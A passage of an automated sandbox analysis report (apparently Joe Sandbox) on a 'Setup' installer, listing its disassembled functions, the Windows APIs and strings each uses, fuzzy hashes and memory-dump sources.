                                                                                              • API String ID: 4058884840-0
                                                                                              • Opcode ID: bfa994279814e2a1d774aaf6bfa2c051750c419787872cb299ba038ff999c067
                                                                                              • Instruction ID: a3bea92ff5acfe33c0a5628fe6e6eaf5e54af2e563204642bd5e4889adfa3ff3
                                                                                              • Opcode Fuzzy Hash: bfa994279814e2a1d774aaf6bfa2c051750c419787872cb299ba038ff999c067
                                                                                              • Instruction Fuzzy Hash: 5F5117719002598BCB34DFA8CA95BDDB7B4BF14344F5048EA911AB7A40EB709F89CF61
                                                                                              Function 6C8D5CE1 Relevance: 7.6, APIs: 5, Instructions: 113comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D5CE8
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8D5D1A
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000), ref: 6C8D5D38
                                                                                              • CoUninitialize.COMBASE(?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C8D5DE8
                                                                                              • SysFreeString.OLEAUT32(00000738), ref: 6C8D5DF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2737710906-0
                                                                                              • Opcode ID: 8289609fb2acf761aa66a41ba5f3090fed34d0d099388309bb97bbbc419d999c
                                                                                              • Instruction ID: ef44fa7edd30709e8fc43c332a1fdc2ed010152be1c1cdb426495acd7bd2f2b4
                                                                                              • Opcode Fuzzy Hash: 8289609fb2acf761aa66a41ba5f3090fed34d0d099388309bb97bbbc419d999c
                                                                                              • Instruction Fuzzy Hash: 03415BB0A00249EFDF10DFA8C9889ED7BB5FF45308F248869E555DB641C735EA45CB60
                                                                                              Function 6C909BB9 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C909BC3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • GetCommandLineW.KERNEL32(?,?,6C8BA794,?,?,00000164,6C8E4730,02F92298,6C8BA794,?,?,?,6C90B57F,?,00000000,?), ref: 6C909BEF
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909C42
                                                                                              • SysFreeString.OLEAUT32(6C8FFA6E), ref: 6C909CCC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909CF3
                                                                                                • Part of subcall function 6C8E473C: __EH_prolog3_catch.LIBCMT ref: 6C8E4746
                                                                                                • Part of subcall function 6C8E473C: CoInitialize.OLE32(00000000), ref: 6C8E47F7
                                                                                                • Part of subcall function 6C8E473C: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C8E4815
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3727545618-0
                                                                                              • Opcode ID: 2ef36bbc948aa3bb1d89d83464084291dfbe04f8a60c932965f7a9c18d57a9ac
                                                                                              • Instruction ID: 5b8a36d377b21508df4336278e25e4807da7fa7ae2780bbc7b7b25aaebad760a
                                                                                              • Opcode Fuzzy Hash: 2ef36bbc948aa3bb1d89d83464084291dfbe04f8a60c932965f7a9c18d57a9ac
                                                                                              • Instruction Fuzzy Hash: 9A41677280020DEFCF11DFE8CD44AEEBBB8AF15318F008569E514A7640CB34DA18CBA1
                                                                                              Function 63965EC4 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 63965F27
                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 63965F3E
                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 63965F50
                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 63965F6A
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 63965F79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$CallProc
                                                                                              • String ID:
                                                                                              • API String ID: 513923721-0
                                                                                              • Opcode ID: 91196c62b1f9f0128af2d691eb506a7eebb86f693cad7fe93047673f222fa7dd
                                                                                              • Instruction ID: 7b49f5962fbc1817e87528423503e94c540fda688c7609600b1dbee9bfa92b58
                                                                                              • Opcode Fuzzy Hash: 91196c62b1f9f0128af2d691eb506a7eebb86f693cad7fe93047673f222fa7dd
                                                                                              • Instruction Fuzzy Hash: 37314931504608EFDF21DF65C88499ABBF9FF49720B108A19F8AAD7261D730E950DF90
                                                                                              Function 63956655 Relevance: 7.6, APIs: 5, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6395665C
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395F35E: __EH_prolog3.LIBCMT ref: 6395F365
                                                                                                • Part of subcall function 6395F35E: __recalloc.LIBCMT ref: 6395F3A7
                                                                                              • _memset.LIBCMT ref: 639566C3
                                                                                              • GetClientRect.USER32 ref: 639566E6
                                                                                              • SendMessageW.USER32(00000001,00000432,00000000,?), ref: 639566FC
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6395730F,?,?,?,?,?,?,?,?,?), ref: 63956713
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4097222183-0
                                                                                              • Opcode ID: 3f7c6f9f25123f1ed515a8890b373315e5c724453bb45f051ceb3f4128b22f30
                                                                                              • Instruction ID: 5166f560623152f714e6b417adcd1b391c09f64f3b1b61e366f38ab4219758f6
                                                                                              • Opcode Fuzzy Hash: 3f7c6f9f25123f1ed515a8890b373315e5c724453bb45f051ceb3f4128b22f30
                                                                                              • Instruction Fuzzy Hash: A3214C71901208EFDB24DF98C988D9EBBF8FF55B28F144019F515AB290D730AA56CF50
                                                                                              Function 6C920F64 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6C920F72
                                                                                                • Part of subcall function 6C91BFB3: __FF_MSGBANNER.LIBCMT ref: 6C91BFCC
                                                                                                • Part of subcall function 6C91BFB3: __NMSG_WRITE.LIBCMT ref: 6C91BFD3
                                                                                                • Part of subcall function 6C91BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C8F831D,00000000,?,6C91C0C9,6C8FF845,00000C00,00000020,6C8FF845,?), ref: 6C91BFF8
                                                                                              • _free.LIBCMT ref: 6C920F85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1020059152-0
                                                                                              • Opcode ID: 4dec31f42bed2a060b2aee832c4af097b5f58c2f86ca7d40733a2f4e19ffb3d2
                                                                                              • Instruction ID: 22836ce33209426e16f0646d671f73912d20c0e12f5bcb3b1be984e812ccbb31
                                                                                              • Opcode Fuzzy Hash: 4dec31f42bed2a060b2aee832c4af097b5f58c2f86ca7d40733a2f4e19ffb3d2
                                                                                              • Instruction Fuzzy Hash: 0B115E325AC289EFCB311B75AA156CD3B799F613A4B214035F884DAF44DF38C85487D0
                                                                                              Function 6C8E5238 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000), ref: 6C8E5254
                                                                                              • _memset.LIBCMT ref: 6C8E526E
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C8E5288
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C8E52A3
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C8E52B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2526126748-0
                                                                                              • Opcode ID: 75c19397952258b606e67004829cf0ab52ea8212b3f070aef35071b54ec2ece5
                                                                                              • Instruction ID: 47a5022e820b2b1309f2abc7a4945016bb44d9d1171eebb96877c273249ae8b2
                                                                                              • Opcode Fuzzy Hash: 75c19397952258b606e67004829cf0ab52ea8212b3f070aef35071b54ec2ece5
                                                                                              • Instruction Fuzzy Hash: 91018031A01128ABCB20DAA5994DEEE77B8EB8B318F500569E914D3680DB34DA45CAA1
                                                                                              Function 6394F24C Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 6394F257
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6394F286
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 6394F28F
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 6394F2A5
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6394F2AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CallbackDispatcherItemTextUser
                                                                                              • String ID:
                                                                                              • API String ID: 3009180066-0
                                                                                              • Opcode ID: 2d5c9a860a2dcc3fdf648386ea9990343141e33cea793eef2b883599f0cd42c4
                                                                                              • Instruction ID: b35f8e0bd72d3cc539356819bce3999a657e6e48b3e3423c5b453cbce0a20140
                                                                                              • Opcode Fuzzy Hash: 2d5c9a860a2dcc3fdf648386ea9990343141e33cea793eef2b883599f0cd42c4
                                                                                              • Instruction Fuzzy Hash: C1012438344201AFCB10AF68C88CF19BBE9EF4EB46F104444F6428B2A2DB35D821CF94
                                                                                              Function 6C8D2E48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D2E4F
                                                                                                • Part of subcall function 6C8F9653: _free.LIBCMT ref: 6C8F9698
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_free
                                                                                              • String ID: evaluated to false$ evaluated to true$BlockIf
                                                                                              • API String ID: 2248394366-2909538125
                                                                                              • Opcode ID: 1fd387a319fb295dde1a7a8b70b238757b2cc130a259ef590b93bd00c11d922c
                                                                                              • Instruction ID: 56a000c57443d158dc5047e67bb934235a8793124f57f3887f9817e0396f48dc
                                                                                              • Opcode Fuzzy Hash: 1fd387a319fb295dde1a7a8b70b238757b2cc130a259ef590b93bd00c11d922c
                                                                                              • Instruction Fuzzy Hash: 98A15B71900209DFCF20CFA8CA84ADEBBB5BF19318F154999E415AB751D731ED0ACB61
                                                                                              Function 6C8F4513 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F45A2
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                                • Part of subcall function 6C8C8129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C8CAA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C8C8149
                                                                                              Strings
                                                                                              • .htm, xrefs: 6C8F4763
                                                                                              • Cannot create file or delete file in Temp directory , xrefs: 6C8F45C5
                                                                                              • Cannot get valid temp folder, xrefs: 6C8F456D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FilePointerThrow
                                                                                              • String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
                                                                                              • API String ID: 1975055723-2150540039
                                                                                              • Opcode ID: 5fa5a53bac8a2858db7dd9db270bed228df1dcaf342e745101c7bc4165584a1e
                                                                                              • Instruction ID: a6d9dba7854728925ea8b0e824091c7f8b0abd70e9ddf0623312d6af44b52cd1
                                                                                              • Opcode Fuzzy Hash: 5fa5a53bac8a2858db7dd9db270bed228df1dcaf342e745101c7bc4165584a1e
                                                                                              • Instruction Fuzzy Hash: C2A17C711083449FD720DFA8CA41B8EBBE8BF95368F004E2EF4A497B90D774D5098B52
                                                                                              Function 6C8E2E7C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2E83
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8E2DBC: __EH_prolog3.LIBCMT ref: 6C8E2DC3
                                                                                                • Part of subcall function 6C8F91D4: __EH_prolog3.LIBCMT ref: 6C8F91DB
                                                                                                • Part of subcall function 6C8F91D4: __recalloc.LIBCMT ref: 6C8F921D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
                                                                                              • API String ID: 1900422986-3251087430
                                                                                              • Opcode ID: 46f1e4835997741ad51a7a3145e114bb785acd98e55a547d3a01d18ffc39b314
                                                                                              • Instruction ID: 8f86901ba4069ae8d13bc468a88f997f3c22f4806bd715bff546f5cedbb68486
                                                                                              • Opcode Fuzzy Hash: 46f1e4835997741ad51a7a3145e114bb785acd98e55a547d3a01d18ffc39b314
                                                                                              • Instruction Fuzzy Hash: 86716170A0024ADFCF10CFA8CA84AADBBB5BF49308F144869E515EB791C7359E45CB61
                                                                                              Function 6C8E31C4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E31CB
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8E3104: __EH_prolog3.LIBCMT ref: 6C8E310B
                                                                                                • Part of subcall function 6C8F91D4: __EH_prolog3.LIBCMT ref: 6C8F91DB
                                                                                                • Part of subcall function 6C8F91D4: __recalloc.LIBCMT ref: 6C8F921D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
                                                                                              • API String ID: 1900422986-3373415214
                                                                                              • Opcode ID: d94714d1a96495a567de6b965e71e706b8b28dced02d7073f77941ce3ae31098
                                                                                              • Instruction ID: abcdd21b8194ac06babd0aad6d145bd4f3e0c919e2722b8e149f92dff2582842
                                                                                              • Opcode Fuzzy Hash: d94714d1a96495a567de6b965e71e706b8b28dced02d7073f77941ce3ae31098
                                                                                              • Instruction Fuzzy Hash: 69714070A00249DFCF10CFA8CA84AAEBBB5BF49308F24496DE515EB791C7359E45CB61
                                                                                              Function 6C8F72E4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8F72EB
                                                                                                • Part of subcall function 6C8C43C4: __EH_prolog3.LIBCMT ref: 6C8C43CB
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8ED0: __EH_prolog3.LIBCMT ref: 6C8F8ED7
                                                                                                • Part of subcall function 6C8F8ED0: PathFindExtensionW.SHLWAPI(?,00000004,6C8F7362,?,?,?,00000000,?,?), ref: 6C8F8F01
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8F3B2B: __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
                                                                                              • String ID: .htm$.html$.txt
                                                                                              • API String ID: 2678321574-1806469533
                                                                                              • Opcode ID: c2daf6da6cf8b8c278104573bd8b3268a377075d56804da04efbc2fb0e853a05
                                                                                              • Instruction ID: 3495629524dc22d415182d864d6b2d4d4a3de3861e604d853f5f8a6f745f5729
                                                                                              • Opcode Fuzzy Hash: c2daf6da6cf8b8c278104573bd8b3268a377075d56804da04efbc2fb0e853a05
                                                                                              • Instruction Fuzzy Hash: 9851D43090420DDEEF20DBB8CA05BDE7BE5AF25348F104965E460EBB80D774C609DB66
                                                                                              Function 6C8FA622 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
